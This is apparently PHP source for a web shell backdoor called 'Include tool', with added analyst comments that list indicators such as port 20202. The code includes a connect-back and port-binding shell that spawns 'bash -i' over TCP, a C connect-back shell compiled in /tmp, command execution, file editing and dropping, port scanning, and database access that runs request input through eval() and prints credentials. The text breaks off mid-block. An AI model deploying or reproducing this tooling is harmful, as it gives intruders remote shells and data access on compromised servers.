		echo "socket_listen() failed: reason: " . socket_strerror($ret) . "
"; 
		return(-3); 
	} 

	return($sock); 
} 
 
###################################################################### 
# Dan's PHP Connect Back / Port Binding Shell! 
# Yes that right a REAL shell! 
# Now I had this idea for ages, finally coded it 6 months ago, and  
# it's never really been used. 
# Not really brain science but when there are many examples of PHP  
# sockets + proc_open it's a little harder. 
###################################################################### 
 
# DB_Shell: attach the stdin/stdout/stderr of a spawned process to a TCP
# socket and relay data between the two until either side fails.
#   $type   "cb" = connect out to $host:$port (rejected when $host is
#           "0.0.0.0"); "pb" = listen on $host:$port and accept one connection
#   $shell  command line handed to proc_open()
#   $port   TCP port to connect to or listen on
#   $host   peer address for "cb", bind address for "pb"
# Returns an error string on setup failure; otherwise nothing is returned
# once the relay loop ends.
# Defender note: what this looks like on a host is a PHP / web server worker
# that starts a child shell process and holds a long-lived TCP connection
# (outbound for "cb", a new listening port for "pb"); the defaults set
# elsewhere in this script use port 20202 and raise the time limit to 9000
# seconds. Listing proc_open in disable_functions and restricting egress
# from web servers both remove this capability.
function DB_Shell($type, $shell, $port, $host = "0.0.0.0") { 
	if($type == "cb" && $host != "0.0.0.0") { 
		$procsock = DB_NET_CONNECT($host, $port, "tcp"); 
	} elseif ($type == "pb") { 
		$lsock = DB_NET_LISTEN($host, $port); 
		if (($procsock = socket_accept($lsock)) < 0) { 
    		return "socket_accept() failed: reason: " . socket_strerror($procsock) . "
"; 
    	} 
	} else { 
		return "Error no connection details specified!"; 
	} 

	# keep the request alive well beyond the usual script time limit
	set_time_limit(9000); 
	# child process: pipe 0 = its stdin, pipes 1 and 2 = its stdout and stderr
	$descriptorspec = array( 
		0 => array("pipe", "r"), 
		1 => array("pipe", "w"), 
		2 => array("pipe", "w") 
	); 
	$process = proc_open($shell, $descriptorspec, $pipes); 
	if (is_resource($process)) { 
		$tmp_loop = 1; 
		do { 
			# socket -> process: timeout 0 means poll without blocking
			$tmp_array = array($procsock); 
			$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0); 
			if ($num_changed_sockets === false) { 
				$tmp_loop = 0; 
			} else if ($num_changed_sockets > 0) { 
				foreach($tmp_array as $k => $v) { 
					if($v == $procsock) { 
						if(socket_last_error($procsock) > 0) $tmp_loop = 0; 
						if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0; 
						fwrite($pipes[0], $buf); 
					} 
				} 
			} 
			# process -> socket: forward whatever stdout / stderr have ready
			$tmp_arrayS = array($pipes[1], $pipes[2]); 
			$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0); 
			if ($num_changed_streams === FALSE) { 
				$tmp_loop = 0; 
			} else if ($num_changed_streams > 0) { 
				foreach($tmp_arrayS as $k => $v) { 
					if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0; 
					socket_write($procsock, $buf, strlen($buf)); 
				} 
			} 
		} while($tmp_loop == 1); 
	} else { 
		return "Error executing shell " . $shell; 
	} 
} 
 
?> 


Original Code

<?php
######################################################################
# we decide if we want syslogging
closelog();
######################################################################
# define variables
######################################################################

# error_reporting(E_ALL);
# All PHP error reporting is switched off, so failures inside the tool
# produce no notices or warnings.
error_reporting(0);

# get globals even if register_globals is off
# (import_globals() is defined elsewhere in the file; not visible here)
import_globals();

# Read the three ini settings shown in the page banner.
$safe_mode = ini_get('safe_mode');
$register_globals = ini_get('register_globals');
$magic_quotes_gpc = ini_get('magic_quotes_gpc');
# on/off labels in English and German; $lang selects which set is used
$txt['en']['on']="on";
$txt['en']['off']="off";
$txt['de']['on']="an";
$txt['de']['off']="aus";
$lang="en";

# Translate each setting into its display label ($SM, $RG, $MQ).
if($safe_mode == 1) $SM = $txt[$lang]['on'];
else { 
	$SM = $txt[$lang]['off'];
	# set_time_limit(9000);
}
if($register_globals == 1) $RG = $txt[$lang]['on'];
else $RG = $txt[$lang]['off'];
if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on'];
else $MQ = $txt[$lang]['off'];

# Feature switches ("navigatable functions"): one entry per tool panel, all
# defaulting to 0 (off). The keys double as request parameter names, so they
# are usable search terms when reviewing access logs for use of this tool.
$ArrFuncs = array(
	"dropinc"	=> 0,
	"filecopy"	=> 0,
	"fileedit"	=> 0,
	"showsource"	=> 0,
	"snoop"		=> 0,
	"cmdln"		=> 0,
	"connectback"	=> 0,
	"phpshell"	=> 0,
	"servicecheck"	=> 0,
	"mysqlaccess"	=> 0,
	"mail"		=> 0,
	"env"		=> 0,
	"phpenv"	=> 0,
	"phpinfo"	=> 0,
	"dumpvars"	=> 0,
	"debugscript"	=> 0,
	"syslog"	=> 0
);

# init navigation: create a global variable named after each switch unless a
# variable of that name already exists, so a value already in scope wins over
# the 0 default (presumably one imported from the request by
# import_globals(); its definition is not visible here).
foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;



# set default values for the form fields of every panel. As with the feature
# switches, a default is applied only when no variable of that name is
# already set.
# Defender note: several of these literals are useful indicators -- the
# connect-back / shell port 20202, the temp directory "/tmp" where
# connect_back() writes "cbs.c" and the compiled "cbs", and the drop file
# name "miniinc.php".
$ArrDefaults = array(
	"filecopy_source" => "http://...",
	"filecopy_dest" => getcwd(),
	"cmdcall" => "",
	"editfile" => getcwd(),
	"editcontent" => "",
	"chdir" => ".",
	"vsource" => $SCRIPT_FILENAME,
	"mail_from" => "[email protected]",
	"mail_to" => "",
	"mail_subject" => "", 
	"mail_attach_source"  => "http://....",
	"mail_attach_appear"  => "filename...",
	"mail_content_type"   => "image/png",
	"mail_msg" => "",
	"tcpports" => "21 22 23 25 80 110",
	"timeout" => 5,
	"miniinc_loc" => getcwd() . "/miniinc.php",
	"incdbhost" => "localhost",
	# connect-back target defaults to the address of the requesting client
	"cbhost" => $_SERVER['REMOTE_ADDR'],
	"cbport" => 20202,
	"cbtempdir" => "/tmp",
	"cbcompiler" => "gcc",
	"phpshellapp" => "export TERM=xterm; bash -i",
	"phpshellhost" => "0.0.0.0",
	"phpshellport" => "20202"
);

# init defaults
foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;

# define executable functions
$Mstr = array(
	0 => "No execute functions available!",
	1 => "passthru()",
	2 => "system()",
	3 => "backticks",
	4 => "proc_open()",
	5 => "exec()"
);

# clean request to avoid uri monster
# Builds $SREQ, the "key=value&key=value" string that is appended to the
# script's own URL in every link and form action the tool renders.
# $REQUESTS is not assigned in the visible part of the file (presumably set
# by import_globals() -- confirm). The first pair is always kept; later pairs
# are kept when any of the three inequality tests holds.
# Keys and values are joined as received, without URL or HTML encoding.
$SREQ = "";
$reqdat = array();
$tmpCount=0;
foreach($REQUESTS as $key => $val){
	if($tmpCount==0) $reqdat[] = $key."=".$val;
	else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
	$tmpCount++;
}
$SREQ = implode("&", $reqdat);
$tmpCount=0;
# Fallback: nothing came out of $REQUESTS, so re-parse the raw query string
# with the same keep/skip rule.
if($SREQ=="") {
	$tmp_req = array();
	$tmp_qry = explode("&", $QUERY_STRING);
	foreach($tmp_qry as $key => $val) {
		$tmp_val = explode("=", $val);
		if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
		else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
		$tmpCount++;
	}
	$SREQ = implode("&", $tmp_req);
}

# carry a path[docroot] parameter along when one is present
if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot'];

# set some defaults to avoid errors
# (the four arrays are filled by snoopy() and read by echo_files())
$is_file   = array();
$is_dir    = array();
$is_w_dir  = array();
$is_w_file = array();
$emeth=0;
# Normalise $chdir: values shorter than two characters other than "/" fall
# back to the working directory, "//" is collapsed once, and a trailing
# slash is ensured.
if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
$chdir = str_replace("//", "/", $chdir);
if(substr($chdir, -1) != "/") $chdir .= "/";
##
# Setup whether to use PHP_SELF or SCRIPT_NAME
if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
else $MyLoc = $SCRIPT_NAME;

# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
# The self-URL is always built with the http:// scheme from SERVER_NAME and
# SERVER_PORT, regardless of how the page was requested.
$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;

# This is a list of internal inc.inc vars that do not get displayed 
# inside the dumpvars function (poss for a debug func later?)
$DebugArr = array(
	'ARHGFDGFGASDFG',
	'safe_mode',
	'register_globals',
	'magic_quotes_gpc',
	'txt',
	'lang',
	'SM',
	'RG',
	'MQ',
	'ArrFuncs',
	'val',
	'key',
	'env',
	'phpenv',
	'phpinfo',
	'debugscript',
	'filecopy',
	'fileedit',
	'showsource',
	'snoop',
	'mail',
	'cmdln',
	'syslog',
	'servicecheck',
	'dropinc',
	'mysqlaccess',
	'ArrDefaults',
	'filecopy_source',
	'filecopy_dest',
	'cmdcall',
	'editfile',
	'editcontent',
	'chdir',
	'vsource',
	'mail_from',
	'mail_to',
	'mail_subject',
	'mail_attach_source',
	'mail_attach_appear',
	'mail_content_type',
	'mail_msg',
	'tcpports',
	'timeout',
	'miniinc_loc',
	'incdbhost',
	'Mstr',
	'SREQ',
	'reqdat',
	'tmpCount',
	'is_file',
	'is_dir',
	'is_w_dir',
	'is_w_file',
	'emeth',
	'MyLoc',
	'dumpvarsare',
	'DebugArr',
	'cbtempdir',
	'cbcompiler',
	'cbhost',
	'cbport',
	'phpshelltype',
	'phpshellapp',
	'phpshellhost',
	'phpshellport'
);


# activate syslog entry
if($syslog == 1)
{
#	openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
#	drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
}
###############################################################################
#
# start include output 
#
###############################################################################
$strOutput = "";
$strOutput .= "<html><body bgcolor='#ffffff'>
<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'>
<center>
<h2>Include tool</h2>
PHP Version: " . phpversion() . " | 
safe_mode: $SM |
register_globals: $RG | 
magic_quotes_gpc: $MQ | 
syslogging: ";
if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
$strOutput .= "
<br><br>
</center>
<font color='#000000'>";
foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key); 

###############################################################################
# test cmd shell environment
###############################################################################
if($env == 1) { 
	$strOutput .= "
	<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr>
	<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>";
	if($emeth==0) { 
		$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>";
	} else {
		$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr>
		<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr>
		<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr>
		</table>";
	}
}

###############################################################################
# test php environment
###############################################################################
if($phpenv == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr>
		<tr><td colspan=2>posix infos</td><tr>";
		if(function_exists('posix_uname')) {
			$posix_uname = posix_uname();
			while (list($info, $value) = each ($posix_uname)) {
				$strOutput .= "<tr><td>$info</td><td>$value</td></tr>";
			}
		} else {
			$strOutput .= "posix_uname not available";
		}
		$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>";
		if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>";
		else $strOutput .= "posix_getuid not available";
		if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>";
		else $strOutput .= "posix_geteuid not available";
		if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>";
		else $strOutput .= "posix_getgid not available";
	$strOutput .= "</table>";
}


###############################################################################
# dump variables
###############################################################################
if($dumpvars == 1) {
	$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr>
	<tr><td>" . dd("GLOBALS") . "</td></tr>
	</table>";
}
###############################################################################
# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if($debugscript == 1) { ?>
	<table border=1><tr><td><h3>debug script</h3></td></tr>
	<tr><td>
	<? ddb("DebugArr"); ?>
	</td></tr>
	</table>
<? }
###############################################################################
# copy file
###############################################################################
if($filecopy == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>
	<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>
	<tr><td>destination</td><td><input type=text name='filecopy_dest'  value='" . $filecopy_dest . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr>
	</form>
	</table>";
} 
###############################################################################
# edit file
###############################################################################
if($fileedit == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>
	<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>
	<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>"; 
	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
		$strOutput .= show_file($editfile);
	$strOutput .= "</textarea></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
		$strOutput .= edit_file($editcontent,$editfile,$edit);
 	$strOutput .= "</td></tr>
	</table>
	</form>";
}
###############################################################################
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if($cmdln == 1) {
	$emeth = test_cmd_shell();
	$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>
	<tr><td colspan=2>";
	if($emeth < 3) {
		$strOutput .= "The output of this command will be somewhere on the page!";
		Mexec($cmdcall, $emeth);
	} else {
		$strOutput .= Mexec($cmdcall, $emeth);
	}
	$strOutput .= "</td></tr>
	</form>
	</table>";
}
###############################################################################
# sending mime mail
###############################################################################
if($mail == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr>
	<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr>
	<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr>
	<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr>
	<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr>
	<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr>
	<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr>
	</form>
	</table>";
}

###############################################################################
# drop mini inc handling
###############################################################################
if($dropinc == 1) { 
	if($loc!="") $miniinc_loc = $loc;
	$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr>
	<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2><pre>";
	if($minisave==1) $strOutput .= dropminiinc($miniinc_loc);
	$strOutput .= "</pre></td></tr>
	</form>
	</table>";
} 
###############################################################################
# connect C back shell handling
###############################################################################
if($connectback == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>
	<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>
	<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>
	<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
	$strOutput .= "</td></tr></form></table>";
}

###############################################################################
# PHP shell handling
###############################################################################
if($phpshell == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
	$strOutput .= "</td></tr></form></table>";
}


###############################################################################
# snooping
###############################################################################
if($snoop == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
	</form>
	</table>";
}
###############################################################################
# show highlited source
###############################################################################
# File viewer panel. It runs when showsource is set OR whenever vsource differs
# from its default, so supplying vsource alone is enough to trigger a read.
# The condition uses the bitwise "|" on two boolean operands.
# highlight_file($vsource, 1) returns the highlighted contents of whatever path
# the request names; nothing restricts the path.
if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>
	</form>
	</table>";
}
###############################################################################
# service check
###############################################################################
# "Service check" panel: opens TCP connections from the web server to every
# host/port pair supplied in the request and records the first line each
# service sends back.
# Analyst note: on the network this shows up as the web server process making
# outbound (or internal) TCP connections to a list of ports, which is unusual
# for a PHP worker and worth alerting on.
if($servicecheck == 1) {
# Target defaults to localhost when servhost is empty.
if($servhost!="") $host = $servhost;
else $host = "localhost";

	$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr>
	<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr>
	<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr>
	<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr -->
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2><pre>";

	# Hosts and ports are space-separated lists.
	$hosts = explode(" ", $host);
	$port = explode(" ",$tcpports);
	$values = count($port);
	$numhosts = count($hosts);
	# explode() on an empty string yields one empty element, hence the extra
	# $port[0] != "" test for the single-port case.
	if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n";
	else if($values > 1) $strOutput .= "Checking $values ports..\n";
	else $strOutput .= "No ports specified!!\n";
	if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n";
	else if($numhosts == 1) $strOutput .= "On 1 host..\n";
	else $strOutput .= "No hosts specified!!\n";
	if($numhosts >= 1) {
		for($hcount=0; $hcount < $numhosts; $hcount++) {
			$tmphost = $hosts[$hcount];
			$strOutput .= "\nTesting $tmphost..\n";
			if(($values == 1 && $port[0] != "") | $values > 1) {
				for ($cont=0; $cont < $values; $cont++) {
					# Errors are suppressed with @; the sockets are never closed here.
					@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout);
					$service = getservbyport($port[$cont],"tcp");
					@$get = fgets($sock[$cont]);
					# NOTE(review): isset() is true for false, so a line may be
					# emitted even when nothing was read - confirm on the target PHP.
					if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n";
					flush();
				}
			}
		}
	}
	$strOutput .= "</pre></td></tr>
	</form>
	</table>";
}
###############################################################################
# show phpinfo
###############################################################################
# Environment disclosure: phpinfo() prints directly to the response instead of
# being appended to $strOutput like the other panels.
if($phpinfo == 1){ 
	phpinfo();
}
######################################################################
# db stuff
######################################################################
# Database access form. All incdb* values are request variables interpolated
# into the HTML without escaping; the password field is a plain text input,
# so the supplied password is rendered back in clear text.
# The commented-out "Variables?" row inside the string is literal markup, but
# $incdbvar inside it is still interpolated because the string is
# double-quoted.
if($mysqlaccess == 1) {
	$strOutput .= "<table border=1>
	<form method='post' target='_parent' action='$MyLoc?$SREQ&'>
	<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr>
	<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr>
	<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr>
	<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr>
	<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr>
	<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr>
	<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr>
	<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr -->
	<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr>
	</table>";
}

# Maps the incdb* request fields onto the short names used by the handlers
# below. The host goes into $dbh when incdbvar is non-empty (the eval-based
# handler, which treats the values as variable names) and into $dbH otherwise
# (the handler that uses the values directly). Note the two names differ only
# in the case of the last letter.
if($incdbhost!="" && $incdbuser!="") {
	if($incdbvar!="") $dbh = $incdbhost;
	else $dbH = $incdbhost;
	$dbu = $incdbuser;
	$dbp = $incdbpass;
	if($incdbsql!="") $dbs = $incdbsql;
	if($incdbname!="") $dbn = $incdbname;
	if($incdbtable!="") $dbt = $incdbtable;
	if($incdbfile!="") $dumpfile = $incdbfile;
}

# MySQL handler, indirect form: $dbh/$dbu/$dbp/$dbn hold the NAMES of variables
# whose values are the real connection settings.
if(isset($dbh)) {
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>";
	# Each eval() builds a PHP statement of the form  $Gdbhost = "$<name>";
	# from request-derived text. Because the text is spliced into source code,
	# these four lines evaluate attacker-supplied input as PHP.
	eval("\$Gdbhost = \"\$$dbh\";");
	eval("\$Gdbuser = \"\$$dbu\";");
	eval("\$Gdbpass = \"\$$dbp\";");
	eval("\$Gdbname = \"\$$dbn\";");
	$strOutput .= "<tr><td>";
	# Dispatch: no database name -> list databases; SQL given -> run it;
	# table given -> select its rows; otherwise list tables. A dumpfile switches
	# the query/table cases to the INTO OUTFILE variants.
	# The resolved credentials are echoed into the page in every branch.
	if($dbn=="") {
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
		"</td></tr><tr><td>" .
		display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
	} else if(isset($dbs)) {
		$Gdbsql = $dbs;
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql . 
		"</td></tr><tr><td>";
		if(isset($dumpfile)) {
			$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
		} else {
			$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
		}
	} else if(isset($dbt)) {
		$Gdbtabl = $dbt;
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
		$strOutput .= "</td></tr><tr><td>";
		if(isset($dumpfile)) {
			$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);		
		} else {
			$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
		}
	} else {
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
		"</td></tr><tr><td>" .
		display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
	}
	# Emits a closing pre tag although this block never opened one.
	$strOutput .= "</pre></td></tr></table><br/>";
}

# MySQL handler, direct form: the request values are used as the connection
# settings themselves (no eval). Same four-way dispatch as the indirect form:
# list databases, run SQL, select a table, or list tables; a dumpfile selects
# the INTO OUTFILE variants. Credentials are echoed into the page.
if(isset($dbH)) {
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>";
	if($dbn=="") {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
		"</td></tr><tr><td>".
		display_dbs($dbH, $dbu, $dbp);
	} else if(isset($dbs)) {
		# $dbs is the raw SQL text from the request; it reaches mysql_query()
		# unchanged through dump_query()/display_query().
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs.
		"</td></tr><tr><td>";
		if(isset($dumpfile)) {
			$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
		} else {
			$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
		}
	} else if(isset($dbt)) {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
		$strOutput .= "</td></tr><tr><td> ";
		if(isset($dumpfile)) {
			$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);		
		} else {
			$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
		}
	} else {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
		"</td></tr><tr><td>" .
		display_tables($dbH, $dbu, $dbp, $dbn);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}

# ODBC handler, indirect form. $Odbh is not assigned anywhere in the visible
# code, so it can only be set if it arrives as a request variable - presumably
# via the request-to-globals import; confirm against the earlier part of the
# file.
if(isset($Odbh)) {
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>";
	# Same pattern as the MySQL indirect handler: request-derived text is
	# spliced into PHP source and evaluated.
	eval("\$Gdbhost = \"\$$Odbh\";");
	eval("\$Gdbuser = \"\$$dbu\";");
	eval("\$Gdbpass = \"\$$dbp\";");
	eval("\$Gdbname = \"\$$dbn\";");
	$strOutput .= "<tr><td>";
	if(isset($dbt)) {
		$Gdbtabl = $dbt;
		# NOTE(review): this branch calls display_rows(), the MySQL routine,
		# not Odisplay_rows().
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
		"</td></tr><tr><td>" .
		display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
	} else {
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
		"</td></tr><tr><td> " .
		Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}

# ODBC handler, direct form. Like $Odbh, $OdbH is not assigned in the visible
# code. The status line prints $dbH (the MySQL host variable) while the ODBC
# calls use $OdbH.
if(isset($OdbH)) {
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>";
	if(isset($dbt)) {
